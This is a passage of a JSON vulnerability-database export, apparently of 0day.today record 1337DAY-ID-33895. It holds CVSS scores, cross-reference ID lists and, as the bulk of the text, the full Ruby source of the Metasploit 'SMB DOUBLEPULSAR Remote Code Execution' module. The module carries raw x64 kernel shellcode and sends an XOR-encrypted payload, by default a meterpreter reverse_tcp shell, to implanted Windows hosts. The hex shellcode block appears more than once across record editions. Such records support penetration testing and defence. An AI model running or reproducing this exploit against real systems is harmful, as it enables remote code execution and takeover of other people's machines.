\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:17:27", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "c57b6b4ec34a4f4c961021a893cbd3c3", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T06:15:19", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:15:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T06:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:15:19", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0a2b076156d9565de54657daee1a21d5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": 